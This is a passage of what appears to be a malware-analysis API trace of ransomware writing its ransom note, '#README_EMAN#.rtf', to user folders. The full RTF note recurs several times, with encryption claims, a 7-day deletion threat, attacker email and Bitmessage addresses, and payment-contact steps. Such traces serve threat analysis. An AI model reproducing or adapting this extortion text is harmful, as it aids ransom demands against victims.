middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.790] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.791] CloseHandle (hObject=0x284) returned 1 [0269.791] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\#readme_eman#.rtf")) returned 0xffffffff [0269.791] GetLastError () returned 0x2 [0269.791] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.792] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn 